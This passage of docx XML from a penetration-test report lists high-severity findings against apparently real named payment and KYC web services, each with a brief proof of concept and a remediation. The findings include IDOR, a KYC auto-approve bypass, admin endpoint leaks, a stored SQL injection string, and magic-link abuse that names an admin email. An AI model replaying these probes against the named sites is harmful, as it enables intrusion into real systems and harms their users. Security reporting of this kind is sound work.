        <w:t>POST /api/profile/avatar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Potential SSRF via avatar URL/file upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Endpoint accepts avatar uploads. If it fetches external URLs, SSRF is possible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/profile/avatar → endpoint exists (requires image multipart)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate avatar URLs against allowlist, block internal IP ranges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>HIGH Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H1: Payment Order IDOR (No Ownership Check)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/orders/{id}, /api/payments/status/{ref}, /api/payments/verify/{ref}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any user can access any other user's order/payment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No user ownership verification — any authenticated user can access orders by UUID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/orders/{any-uuid} → returns full order details regardless of requesting user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add user ownership check — verify order belongs to requesting user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H2: No Rate Limiting on Sensitive Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-307</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /auth/login, /auth/change-password, /kyc-verify/detect-bank, /payments/gateway-checkout, /auth/register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Mass enumeration, brute force, spam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Multiple critical endpoints lack rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Auth/change-password: no rate limit. KYC resolve: 21+ sequential requests, zero limiting. Register: no limit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement rate limiting on all sensitive endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H3: Admin JavaScript Bundles Publicly Accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/assets/Admin*.js (15+ chunks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Complete admin API endpoint map and role requirements leaked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>All admin JS chunks served publicly. 94+ admin endpoints with role requirements extracted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Downloaded chunks:</w:t>
        <w:br/>
        <w:t>AdminDeveloperTools-ClLA20Kw.js → dev/sql/run, dev/env/safe, dev/cron/status</w:t>
        <w:br/>
        <w:t>AdminFinancials-CeBQMIb1.js → funded-payouts, manual-funded-payouts</w:t>
        <w:br/>
        <w:t>AdminSecurity-DKIxGk1l.js → rbac/permissions, sessions/all</w:t>
        <w:br/>
        <w:t>AdminRBAC-*.js → role management endpoints</w:t>
        <w:br/>
        <w:t>...15+ chunks total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Serve admin chunks only to authenticated admin users, move endpoint names to server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H4: CORS Middleware Crash on Admin Endpoints (Origin Header)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-942, CWE-755</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>All /api/admin/* endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Origin header causes 500 crash before auth check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Adding Origin header crashes CORS middleware before authentication runs. Also returns Access-Control-Allow-Credentials: true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/admin/dev/env/safe</w:t>
        <w:br/>
        <w:t>Origin: https://evil.com → 500 Internal Server Error</w:t>
        <w:br/>
        <w:t>Origin: https://www.nairaprop.com → 403 Forbidden (correct)</w:t>
        <w:br/>
        <w:t>→ Confirms CORS handler runs BEFORE auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Fix CORS middleware error handling, validate origin before proceeding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H5: Password Change Without Current Password Verification Rate Limit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-307</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/change-password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Brute-force possible on password change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No rate limit on failed password change attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>No rate limiting detected on repeated change-password attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add rate limiting and account lockout on failed attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H6: No Token Invalidation After Password Change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-613</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/change-password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Old JWT continues working after password change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>7-day JWT expiry with no refresh or invalidation mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Password changed → old JWT still valid for full 7-day expiry period</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Invalidate all sessions on password change, implement refresh tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H7: 7-Day JWT Expiry with No Refresh Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-613</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Authentication system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Compromised tokens remain valid for 7 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JWT has 7-day expiry with no refresh mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>JWT payload: {"exp": 1783314048} — 7 days from iat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement short-lived access tokens + refresh token rotation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H8: KYC Confirm with account_id Auto-Approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/resolve (with account_id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Bypasses entire KYC verification flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>When account_id is included, the system auto-approves without verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /kyc-verify/resolve {account_id: "..."} → auto-approves KYC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Remove account_id auto-approve path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H9: Stored SQL Code in Orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/gateway-checkout (fullName)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Data integrity/poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SQL injection payloads stored verbatim — parameterized queries prevent execution but the stored SQL code is a data integrity issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fullName: "Test'; SELECT pg_sleep(3)--" → stored verbatim in full_name column</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Sanitize all input before storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H10: PostgreSQL Column Type Disclosure via SQL Error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST https://naireduu.com.ng/api/checkout (email &gt;255 chars)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Database schema disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Email overflow returns raw PostgreSQL error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/checkout {email: "A"*300, ...}</w:t>
        <w:br/>
        <w:t>→ {"error":"value too long for type character varying(255)"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate input length before DB query, return generic error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H11: Script Token System Exposed in Response Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>All squad-redirect responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Admin automation system details leaked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Script token headers exposed for admin account creation scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>X-Script-Token-Expires: &lt;timestamp&gt;</w:t>
        <w:br/>
        <w:t>X-Script-Token-Jti: &lt;jwt-id&gt;</w:t>
        <w:br/>
        <w:t>X-Script-Max-Uses: &lt;number&gt;</w:t>
        <w:br/>
        <w:t>Access-Control-Expose-Headers: ..., X-Script-Token-*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Remove X-Script-Token-* from Access-Control-Expose-Headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H12: Magic Link Authentication — No Account Existence Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-204, CWE-308</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/magic-link/request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirms admin account existence, sends passwordless login tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Returns 200 for real emails including admin. No 2FA enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/auth/magic-link/request</w:t>
        <w:br/>
        <w:t>{"email": "shai@nairaprop.com"} → 200 {"success":true}</w:t>
        <w:br/>
        <w:br/>
        <w:t>GET /api/auth/2fa/status → {"enabled":false}</w:t>
        <w:br/>
        <w:t>→ Stolen magic link = immediate admin access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add account existence obfuscation, enforce 2FA for admin accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H13: PostgreSQL Column Type via Manual Payment fullName Overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request (fullName &gt;255)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>DB schema disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>fullName overflow returns unhandled PostgreSQL error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
